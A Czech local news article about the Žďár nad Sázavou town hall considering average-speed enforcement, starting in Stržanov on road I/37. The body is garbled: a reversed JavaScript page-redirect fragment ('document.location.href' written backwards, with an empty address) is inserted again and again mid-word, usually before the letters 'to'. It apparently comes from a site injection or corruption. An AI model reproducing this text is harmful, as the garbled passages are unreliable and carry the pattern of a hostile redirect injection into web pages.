Rainbow page separator

Ve Žďáře zvažují usměrnit dopravu úsekovým měřením

Sobota, 27. listopadu 2021

Žďár nad Sázavou / Myšlenkou úsekového měření rychlosti v některých částech města se zabývá žďárská radnice. V první fázi by se mělo jednat o projekt v místní části Žďáru Stržanov. Zástavba osady, jejímž okrajem prochází frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná statní silnice I/37, se nachází mimo hlavní komunikaci, takže v místě je povolená rychlost 70 kilometrů v hodině, nicméně rovná silnice svádí řidiče k podstatně vyšší rychlosti. Sedmdesátku, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i poměrně výrazně, nedodržuje zhruba pětina projíždějících mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristů.
„Další úseky by mohly v budoucnu být v některých částech hlavních silnic procházejících Žďárem, tedy komunikací I/37 a I/19. Tomu však musí předcházet analýza, vyhodnocení a doporučující stanovisko dopravní policie jakož[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nejpovolanějšího orgánu,“ uvedl starosta Žďáru nad Sázavou Martin Mrkos.
Úsekové měření se záznamem má za následek au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatickou pokutu udělenou provinilému šoférovi, jenž v daném úseku překročil povolenou rychlost. Nedávno ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsob kontroly zavedla také novoměstská radnice, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v místní části Rokytno a také na silnici I/19 na průjezdu městem od Bystřice nad Pernštejnem po křižovatku u Billy.